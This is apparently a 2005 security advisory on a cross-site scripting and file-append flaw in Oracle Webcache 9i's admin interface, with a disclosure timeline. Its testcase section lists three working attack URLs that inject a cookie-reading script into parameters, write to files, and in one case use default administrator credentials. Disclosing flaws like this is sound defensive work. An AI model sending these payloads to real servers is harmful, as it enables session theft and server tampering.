Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Append file in Oracle Webcache 9i

Name Append file in Oracle Webcache 9i
Systems Affected Oracle Application Server with Webcache 9i
Severity Low Risk
Category Cross Site Scripting
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 11 May 2005 (V 1.02)
CAN-Number CAN-2005-1381


Details
Many parameters are vulnerable against XSS/CSS attacks. Together with this bug it is possible to corrupt an Oracle Application Server installation.

Patch Information
Oracle fixed this issue with informing me or their customers.

Testcase
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&
cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>

http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&
PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2

http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&
ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>


History
23-sep-2003 Oracle was secalert informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
11-may-2005 CAN added




2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Webcache


Oracle Webcache is part of the Oracle Application Server aka OAS aka IAS

The Oracle Web Cache can be used to cache static and dynamically generated web pages. The cache shouild be your first point for accepting user requests from clients using web browsers.

The Web Cache also provides load balancing and can route non-cached requests to a set of web servers. This privides protection when some of the servers are overloaded or become inaccessable.